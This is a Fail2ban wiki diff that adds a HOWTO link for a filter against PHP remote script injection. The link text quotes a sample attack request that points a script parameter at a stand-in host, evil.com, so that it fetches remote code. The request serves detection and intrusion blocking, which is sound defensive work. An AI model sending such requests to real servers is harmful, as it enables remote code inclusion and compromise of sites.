Difference between revisions of "HOWTOs"

From Fail2ban
Jump to navigationJump to search
(added link to filter config for php injectiona ttacks)
Line 14: Line 14:
 
* [[HOWTO fail2ban with ModSecurity2.5|HOWTO fail2ban with Mod_Security 2.5]] - configure fail2ban to use Mod_Security 2.5 logs
 
* [[HOWTO fail2ban with ModSecurity2.5|HOWTO fail2ban with Mod_Security 2.5]] - configure fail2ban to use Mod_Security 2.5 logs
 
* [http://blogs.buanzo.com.ar/2009/01/fail2ban-rules-for-lighttpd-fastcgi-alerts.html HOWTO fail2ban and lighttpd] - FastCGI's ALERT filter.d config
 
* [http://blogs.buanzo.com.ar/2009/01/fail2ban-rules-for-lighttpd-fastcgi-alerts.html HOWTO fail2ban and lighttpd] - FastCGI's ALERT filter.d config
 +
* [http://blogs.buanzo.com.ar/2009/04/fail2ban-filter-for-php-injection-attacks.html HOWTO fail2ban and PHP remote script injection via GET/POST variables using allow_url_fopen and such] - Fail2ban filter to match "GET /script.php?variable=http://evil.com/evil.txt?" attacks.
  
 
== Installation ==
 
== Installation ==

Revision as of 13:38, 1 April 2009

Configuration

Installation